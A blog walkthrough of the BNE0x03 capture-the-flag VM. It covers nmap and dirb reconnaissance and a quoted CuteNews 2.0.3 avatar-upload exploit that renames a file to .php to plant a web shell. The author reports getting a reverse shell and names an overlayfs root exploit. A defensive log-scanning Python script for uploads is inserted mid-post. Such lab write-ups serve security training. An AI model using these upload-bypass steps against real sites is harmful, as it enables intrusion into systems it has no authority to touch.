Friday, 6 May 2016

BNE0x03 challenge

Hi again,
Today I would like to present a BNE0x03 walkthrough.

So, as always, we should find our target:
root@osboxes:~# nmap -sP 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:02 BST
[CUT]
Nmap scan report for 192.168.1.102
Host is up (0.0018s latency).
MAC Address: 00:0C:29:4E:16:F6 (VMware)
[CUT]

root@osboxes:~# nmap -sV 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:05 BST
Nmap scan report for 192.168.1.102
Host is up (0.0011s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

[CUT]
Scanning all ports does not give us a different result.
Now we browse our target.

Maybe some exploit exists for CuteNews v.2.0.3? I don't know, but I will probably verify it.
Let's run dirb now.
root@osboxes:~# dirb http://192.168.1.102/

[CUT]

==> DIRECTORY: http://192.168.1.102/core/                                     
==> DIRECTORY: http://192.168.1.102/docs/                                     
+ http://192.168.1.102/favicon.ico (CODE:200|SIZE:1150)                       
+ http://192.168.1.102/index.php (CODE:200|SIZE:2487)                         
+ http://192.168.1.102/server-status (CODE:403|SIZE:293)                      
==> DIRECTORY: http://192.168.1.102/skins/                                    
==> DIRECTORY: http://192.168.1.102/uploads/ 
It looks interesting; the application probably has an upload feature.
I tried to bypass authentication via SQL injection, but without success. However, I found an exploit for CuteNews 2.0.3.
==========================================================
 # Exploit  :
  
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
   
 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
   
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
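
On the defensive side, the upload path named in the advisory (uploads/avatar_Username_FileName.php) is easy to hunt for in web server logs. The following is an added example, not part of the original post or of CuteNews: it scans Apache access-log lines for requests to script-like files under /uploads/. The log lines, the extension list and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Extensions commonly mapped to the PHP interpreter (assumed list, adjust to your config).
# "(\.|$)" also catches double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)
# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_upload_script_hits(lines, upload_dir="/uploads/"):
    """Return (ip, timestamp, path, status) for requests to script-like files in upload_dir."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected log format
        # Drop the query string and decode %-escapes before matching.
        path = unquote(urlsplit(m["target"]).path)
        if upload_dir not in path:
            continue
        filename = path.rsplit("/", 1)[-1]
        if SCRIPT_EXT.search(filename):
            hits.append((m["ip"], m["ts"], path, int(m["status"])))
    return hits

def served(hits):
    """Hits answered with 2xx: the file exists and the server returned content for it."""
    return [h for h in hits if 200 <= h[3] < 300]

# Constructed sample log lines (not taken from the walkthrough's target).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2016:09:20:01 +0100] "POST /index.php?mod=main&opt=personal HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/May/2016:09:20:09 +0100] "GET /uploads/avatar_alice_photo.jpg HTTP/1.1" 200 20480',
    '192.0.2.10 - - [06/May/2016:09:21:30 +0100] "GET /uploads/avatar_alice_photo.php HTTP/1.1" 200 12',
    '192.0.2.10 - - [06/May/2016:09:21:44 +0100] "GET /uploads/avatar_alice_photo.PHP5?x=1 HTTP/1.1" 404 290',
    '192.0.2.11 - - [06/May/2016:09:22:02 +0100] "GET /uploads/avatar_bob_pic%2Ephp.jpg HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, ts, path, status in find_upload_script_hits(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {path}")
```

Any 2xx hit returned by served() means a script-like file is reachable in the upload directory and should be treated as an incident lead.
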
OK, so we have to follow the instructions. I registered an account
and I am logged into the application now :-)

Great, now we have to go to the Personal options and upload our avatar (reverse shell). I have uploaded my reverse shell file and I have got

Excellent, we have got a limited shell.
$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I know that all we need is an exploit to get root privileges. I found the "Ubuntu 14.04 LTS, 15.10 - overlayfs Local Root Exploit".
I will leave you at this stage to complete the challenge as an exercise :-)

Game over!